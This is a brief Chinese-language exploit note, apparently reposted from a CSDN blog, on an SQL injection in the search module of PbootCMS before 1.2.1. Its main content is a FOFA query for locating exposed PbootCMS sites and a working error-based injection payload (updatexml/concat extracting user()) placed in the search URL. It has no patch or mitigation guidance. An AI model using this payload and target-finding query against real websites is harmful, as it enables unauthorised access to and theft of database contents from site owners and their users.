i ⭐
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
s ✅
PbootCMS < 1.2.1
d ⭕
FOFA:app="PBOOTCMS"
-
搜索框页面为
-
✅ Payload为
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
https://gylq.gitee.io/time/
来源地址:https://blog.csdn.net/qq_35938621/article/details/125765663